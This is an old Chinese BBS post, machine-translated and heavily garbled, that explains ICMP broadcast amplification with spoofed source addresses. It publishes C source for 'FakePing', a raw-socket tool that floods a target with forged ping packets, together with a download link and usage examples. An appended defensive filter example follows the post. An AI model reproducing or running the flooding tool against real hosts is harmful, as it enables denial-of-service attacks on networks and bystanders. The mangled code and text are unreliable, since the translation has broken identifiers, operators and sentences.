Sending station: BBS Shuimu Tsinghua Station (Fri May 11 22:26:59 2001)
Author: shotgun
Recently many people have been calling on everyone to go and ping some website. I don't understand politics, but from a technical point of view, any denial-of-service attack has to meet one condition: use the least resources of your own in exchange for resource consumption on the attacked side. Having everyone go and ping like this is not only odd, since it buys only minimal damage to the other party; it is also ridiculous: people's war probably belongs to more than 50 years ago, and in the Internet era it is not about how many people you have.
A basic understanding: the center of the Internet is in the United States, and China's part is just a small branch of the Internet (comparable to the concept of a metropolitan area network in the United States). Our cable to North America is called the "North America export". What does that mean? An exit is a door; in other words, it is a bottleneck. So if everyone goes to ping, the first thing to die is China's export gateway (the North China exit to America has bandwidth of only the GB level; very wide? Did you swindle with your family?). Of course, once the North America exit goes down, we obviously cannot see US websites, and those who like to play Ah Q may as well tell others: "The United States has been blown up!" (Strange? But it is not Have yourself a white house "Black" page to Is it like this? It is better to close off the country, disconnect from the Internet, and dream at home of being strong, imagining that we are still in the powerful Tang Dynasty, with people coming from all over the world to pay tribute?
Enough digression; back to the topic. Ping is a tool that checks whether a network host exists by sending ICMP Echo packets (Type 8, Code 0). For a long time, some operating systems (such as Win95) could not handle oversized ping packets, which gave rise to the Ping of Death attack (using large ping packets to crash the other side or clog the network). With upgrades to operating systems, network bandwidth and computer hardware, large ping packets today basically have no great attack effect (distributed attacks excepted). If you must use ping packets to attack other hosts, it does not work unless you use other features of the TCP/IP protocol or defects in the network topology to enlarge the attack strength (so-called positive feedback).
Under normal circumstances, the PING process is like this:
Host A sends an ICMP 8,0 message to host B
Camouflage for host C error reply
Host A ---------------------> Host B -----------------> Host C
In this case, since host A only needs to keep sending ping packets without having to process the returned Echo Reply, the attack power is doubled. In effect both host B and host C are targets of the attack, and it does not leave your own traces; it is a covert way of killing two birds with one stone.
The above method can easily be implemented with SOCK_RAW and a spoofed IP, but even at twice the power the effect is not much to look at. Not good enough; let the enemy do the amplifying for us. TCP/IP has a concept called broadcast: the so-called broadcast means that all hosts on the network will receive messages sent to this address (just like a radio broadcast). If...? That's right! If we send an ICMP Echo packet to the broadcast address (that is, ping the broadcast address), we get a lot of responses: every host on the Ethernet that accepts broadcast packets answers with an ICMP_ECHOREPLY. If you want to test this, ping your LAN's broadcast address from a Unix machine and you will see many responses marked DUP, that is, duplicate packets. (Microsoft's ping program does not unpack multiple responses; after receiving the first packet it discards the ones that follow. Likewise, Microsoft systems do not respond to packets sent to the broadcast address by default, so you had better test on a network with a large number of UNIX hosts.)
By now, clever reader, you must know what I want to do. Yes: when we disguise ourselves as the attacked host and send a ping request to a broadcast address, all the hosts on that broadcast address respond to this ping request (of course, they respond to the attacked host; everyone thinks it was the one that pinged). This way,? the number of hosts that respond to the ping packet)
I wrote a FakePing tool that can be downloaded from http://www.patching.net/shotgun/fakeping.exe. The usage is fakeping.exe fakeip targetip [packetsize]. If targetip is a broadcast address, fakeip is the attack target.
The source code is published below (written in a hurry, so the code is rather messy; please excuse it) */
//
///
// fakeping for win2k by shotgun //
///
// Released: [2001.4] //
// Author: [Shotgun] //
// HomePage: //
// [http://it.xici.net] //
// [http://www.patch "//////////
///
//
#include
#include
#include
#include
#define seq 0x28376839
#define status_failed 0xffff File: // Error return value
Typedef struct _iphdr file: // Define IP headers
{
Unsigned char h_verlen; file: // 4 head length, 4-digit IP version number
Unsigned char TOS; File: // 8-bit service type TOS
Unsigned short total_len; file: // 16-bit total length (bytes)
UNSIGNED SHORT IDENT; File: // 16 Limits Unsigned Short Frag_and_Flags; File: // 3 Bit Number Unsigned Char Ttl; File: // 8 Bit Survival Time TTL
Unsigned char proto; file: // 8-bit protocol (TCP, UDP or other)
UNSIGNED Short Checksum; File: // 16-bit IP header checksum
Unsigned int sourceip; file: // 32 bitsource IP address
Unsigned int desip; file: // 32 bit ip address
} Ip_header;
//
/ / Define ICMP's head
Typedef struct _ihdr
{
Byte I_TYPE; File: // 8-bit type
Byte i_code; file: // 8 bit code
Ushort i_cksum; file: // 16-bit checksum
Ushort i_id; file: // Identification number (generally used process number as identification number)
Ushort i_seq; file: // message serial number
Ulong timestamp; file: // Timestamp
ICMP_HEADER;
File: // Checksum: Subfremers for calculating the checksum
Ushort Checksum (Ushort * Buffer, int size)
{Unsigned long cksum = 0; while (size> 1) {cksum = * buffer ;
Size - = SizeOf (Ushort);
}
IF (size) {
CKSUM = * (Uchar *) BUFFER;
}
CKSUM = (CKSUM >> 16) (CKSUM & 0xFFF);
CKSUM = (CKSUM >> 16);
Return (Ushort) (~ CKSUM);
}
FILE: // FAKEPING main function
INT main (int Argc, char ** argv)
{
Int DataSize, ErrorCode, Counter, Flag;
INT Timeout = 2000, SendSeq = 0, PacketSize = 32;
CHAR Sendbuf [65535] = {0};
Wsadata wsadata;
Socket SockRaw = (socket) NULL;
Struct SockAddr_in destaddr;
IP_HEADER IP_HEADER;
ICMP_HEADER ICMP_HEADER;
Char FakesourceIP [20], Destip [20];
File: // Accept command line parameters
IF (Argc <3)
{
Printf ("Fakeping By Shotgun / N");
Printf ("/ TTHIS Program Can Do Ping-Flooding From A Fakeip / N");
Printf ("/ Tusing a Broadcast IP as The Fakeip Will Enhance THE EFFECT / N");
Printf ("email: / n");
Printf ("/ tshotgun@xici.net/n");
Printf ("Homepage: / N");
Printf ("/thttp://it.xici.net/n");
Printf ("/thttp://www.patching.net/n");
Printf ("Usage: /n/tfakeding.exe fakesourceip destinationip [packetsize] / n");
Printf ("eXample: / n");
Printf ("/ TFAKEPING.EXE 192.168.15.23 192.168.15.255/N");
Printf ("/ TFAKEPING.EXE 192.168.15.23 192.168.15.200 6400 / n");
exit (0);
}
STRCPY (FakesourceIP, Argv [1]);
STRCPY (Destip, Argv [2]);
IF (Argc> 3) PacketSize = ATOI (Argv [3]);
IF (PacketSize> 60000)
{
Printf ("Error! Packet size Too Big, Must <60k / N");
exit (0);
}
Printf ("now fake% s ping% s using packet size =% d bytes / n",
FakesourceIP, Destip, PacketSize;
Printf ("/ tctrl c to quit / n");
File: // Initialize SOCK_RAW
IF ((ERRORCODE = WSAStartup (Makeword (2, 1), & WSADATA))! = 0)
{
FPrintf (stderr, "wsastartup failed:% d / n", erroorcode);
EXITPROCESS (STATUS_FAILED);
}
IF ((SockRaw = WSASASOCKET (AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED) == Invalid_socket
{
FPRINTF (stderr, "wsasocket () failed:% d / n", wsagetlasterror ());
EXITPROCESS (STATUS_FAILED);
}
Flag = true;
File: // Set IP_HDRINCL with your own IP head
ErrorCode = setsockopt (SockRaw, Ipproto_IP, IP_HDRINCL, (CHAR *) & flag, sizeof (int));
IF (ErrorCode == Socket_ERROR)
Printf ("SET IP_HDRINCL ERROR! / N");
__Try {
File: // Settings Send Timeout ErrorCode = Setsockopt (SockRaw, SOL_Socket, SO_SNDTIMEO, (CHAR *) & Timeout, SizeOf (Timeout);
IF (ErrorCode == Socket_ERROR)
{
FPRINTF (stderr, "failed to set send timeout:% d / n", wsagetlasterror ());
__leave;
}
MEMSET (& DestadDR, 0, Sizeof (Destaddr));
Destaddr.sin_family = af_INet;
Destaddr.sin_addr.s_addr = inet_addr (destip);
File: // Fill the first part of IP
IP_HEADER.H_VERLEN = (4 << 4 | sizeof (ip_header) / sizeof (unsigned long); file: // High four-digit IP saddle number,? Four first length
IP_HEADER.TOTAL_LEN = HTONS (IP_HEADER) SIZEOF (ICMP_HEADER)); File: // 16-bit total length ((byte?
IP_HEADER.IDENT = 1;
FILE: / / 16-bit identification
IP_HEADER.FRAG_AND_FLAGS = 0;
FILE: // 3 bits of sign
IP_HEADER.TTL = 128;
FILE: // 8-bit survival time TTL
IP_HEADER.PROTO = ipproto_ICMP;
File: // 8-bit protocol (TCP, UDP or other)
IP_HEADER.CHECKSUM = 0;
FILE: / / 16 IP header checksum
IP_HEADER.SOURCEIP = INET_ADDR (FAKESOURCEIP); File: // 32
FILE: // Bit source IP address
IP_HEADER.Destip = inet_addr (destip);
File: // 32 bit ip address
File: // Fill the first part of ICMP
ICMP_HEADER.I_TYPE = 8;
ICMP_HEADER.I_CODE = 0;
ICMP_HEADER.I_CKSUM = 0;
ICMP_HEADER.I_ID = 2;
ICMP_HEADER.TIMESTAMP = 999;
ICMP_HEADER.I_SEQ = 999;
Memcpy (Sendbuf, & ICMP_HEADER, SIZEOF (ICMP_HEADER));
MEMSET (Sendbuf SizeOf (ICMP_HEADER), 'E', PacketSize;
ICMP_HEADER.I_CKSUM = Checksum ((USHORT *) Sendbuf, sizeof (ICMP_HEADER) PacketSize;
Memcpy (sendbuf, & ip_header, sizeof (ip_header));
Memcpy (SENDBUF SIZEOF (IP_HEADER), & ICMP_HEADER, SIZEOF (ICMP_HEADER));
MEMSET (Sendbuf SizeOf (IP_HEADER) SIZEOF (ICMP_HEADER), 'E', PacketSize;
MEMSET (IP_HEADER) SIZEOF (ICMP_HEADER) PacketSize, 0, 1);
File: // Calculate the size of the send buffer
DataSize = SizeOf (IP_HEADER) SIZEOF (ICMP_HEADER) PacketSize;
IP_HEADER.CHECKSUM = Checksum ((USHORT *) Sendbuf, Datasize;
File: // Plip the send buffer
Memcpy (sendbuf, & ip_header, sizeof (ip_header));
While (1)
{
Sleep (100);
PRINTF (".");
For (counter = 0; counter <1024; counter )
{
File: // Send ICMP Packets
Errorcode = Sendto (SockRaw, Sendbuf, DataSize, 0, (Struct SockAddr *) & Destaddr, Sizeof (Destaddr));
IF (ErrorCode == Socket_ERROR) Printf ("/ Nsend Error:% D / N", getLastError ());
}
}
} // end of try
__finally {
IF (SockRaw! = Invalid_socket) CloseSocket (SOCKRAW);
WSACLEANUP ();
}
Return 0;
} / *
Conclusion:
Patriotism is necessary, and enthusiasm especially so, but technology does not tolerate the slightest fakery, and no amount of impulse will do; it has to be done honestly and solidly. FakePing is not a new technique on the Internet either: long time ago Americans who were cast by us were all achieved. How many people should we organize now? Archimedes, relying on wisdom and knowledge, once used mirrors to protect his home; must we still rely on impulse and blindness against the strong?
Less impulse and blindness, more hard work; otherwise it is still hard.
Patching heroes ......
China
Supplement date: 2001-05-06 11:16:07
The purpose of writing this article is not to call on everyone to attack US sites with the FakePing tool; I just wanted to show a little of what can be done with technical skill.
If everyone pinging is the Boxers going up against cannons with their "blades and guns cannot hurt us", then FakePing is at most a musket, while the United States has already developed the aircraft carrier (the operating system). Is it used by a big knife, a long gun, a fire to buy blessing
This is very tragic, but is there no other way? Can we not go back and develop our own battleships?
If the Second Artillery also comes out, if the technicians of Xichang also go to exercise, we don't wear the country!
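The defensive side of the broadcast amplification described above, as an added example that is not part of the original post: a border-filter decision function that drops packets whose source address cannot be right for the side they arrive on, and ICMP echo requests addressed to a subnet's broadcast address. The names `classify` and `sample_echo` are hypothetical, 192.168.15.0/24 is taken from the tool's usage text, and 198.51.100.7 is a constructed documentation address.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { PASS, DROP_MALFORMED, DROP_SPOOFED_SRC, DROP_BCAST_ECHO };
struct subnet { uint32_t net, mask; };  /* protected subnet, host byte order */

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | p[3];
}

/* Border-filter decision for one raw IPv4 packet. inside is 1 when the
   packet is leaving the subnet and 0 when it arrives from outside. */
enum verdict classify(const uint8_t *pkt, size_t len, struct subnet s, int inside) {
    if (len < 20 || (pkt[0] >> 4) != 4) return DROP_MALFORMED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl) return DROP_MALFORMED;
    uint32_t src = be32(pkt + 12), dst = be32(pkt + 16);
    int src_inside = (src & s.mask) == s.net;
    /* Source validation: an inside host must use an inside address, and a
       packet from outside must not claim one. */
    if ((inside != 0) != src_inside) return DROP_SPOOFED_SRC;
    /* ICMP echo request (type 8) to the directed or limited broadcast
       address: dropping it keeps the subnet from answering en masse. */
    uint32_t bcast = s.net | ~s.mask;
    if (pkt[9] == 1 && len > ihl && pkt[ihl] == 8 &&
        (dst == bcast || dst == 0xffffffffu))
        return DROP_BCAST_ECHO;
    return PASS;
}

/* Constructed sample: 20-byte IPv4 header plus 8-byte ICMP echo request.
   Checksums stay zero because classify() does not inspect them. */
void sample_echo(uint8_t buf[28], uint32_t src, uint32_t dst) {
    memset(buf, 0, 28);
    buf[0] = 0x45; buf[3] = 28; buf[8] = 128; buf[9] = 1; buf[20] = 8;
    for (int i = 0; i < 4; i++) {
        buf[12 + i] = (uint8_t)(src >> (24 - 8 * i));
        buf[16 + i] = (uint8_t)(dst >> (24 - 8 * i));
    }
}

int main(void) {
    struct subnet lan = { 0xC0A80F00u, 0xFFFFFF00u };  /* 192.168.15.0/24 */
    uint8_t p[28];
    sample_echo(p, 0xC6336407u, 0xC0A80FFFu);  /* 198.51.100.7 -> broadcast */
    printf("from outside: %d, from inside: %d\n",
           classify(p, 28, lan, 0), classify(p, 28, lan, 1));
    return 0;
}
```

On Linux hosts the broadcast rule corresponds to the `net.ipv4.icmp_echo_ignore_broadcasts` sysctl; the source check is the ingress filtering described in BCP 38.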